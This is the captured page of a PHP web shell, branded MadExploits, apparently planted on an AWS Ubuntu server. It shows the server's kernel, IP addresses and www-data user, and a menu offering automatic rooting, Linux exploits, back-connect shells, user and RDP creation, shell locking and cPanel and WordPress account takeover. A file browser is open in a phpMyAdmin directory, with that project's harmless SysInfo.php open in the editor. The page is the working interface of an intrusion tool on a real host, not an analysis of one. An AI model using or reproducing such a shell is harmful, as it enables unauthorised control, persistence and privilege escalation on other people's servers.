Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.147.69.134
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
src /
Server /
SysInfo /
[ HOME SHELL ]
Name
Size
Permission
Action
Base.php
678
B
-rw-r--r--
Linux.php
2.25
KB
-rw-r--r--
SunOs.php
1.85
KB
-rw-r--r--
SysInfo.php
1.57
KB
-rw-r--r--
WindowsNt.php
5.26
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SysInfo.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Server\SysInfo; use function in_array; use function ucfirst; use const PHP_OS; /** * Library for extracting information about system memory and cpu. * Currently supports all Windows and Linux platforms * * This code is based on the OS Classes from the phpsysinfo project * (https://phpsysinfo.github.io/phpsysinfo/) */ class SysInfo { public const MEMORY_REGEXP = '/^(MemTotal|MemFree|Cached|Buffers|SwapCached|SwapTotal|SwapFree):\s+(.*)\s*kB/im'; /** * Returns OS type used for sysinfo class * * @param string $phpOs PHP_OS constant */ public static function getOs(string $phpOs = PHP_OS): string { // look for common UNIX-like systems if (in_array($phpOs, ['FreeBSD', 'DragonFly'], true)) { return 'Linux'; } return ucfirst($phpOs); } /** * Gets SysInfo class matching current OS * * @return Base sysinfo class */ public static function get(): Base { $phpOs = self::getOs(); switch ($phpOs) { case 'Linux': if (Linux::isSupported()) { return new Linux(); } break; case 'WINNT': if (WindowsNt::isSupported()) { return new WindowsNt(); } break; case 'SunOS': if (SunOs::isSupported()) { return new SunOs(); } break; } return new Base(); } }
Close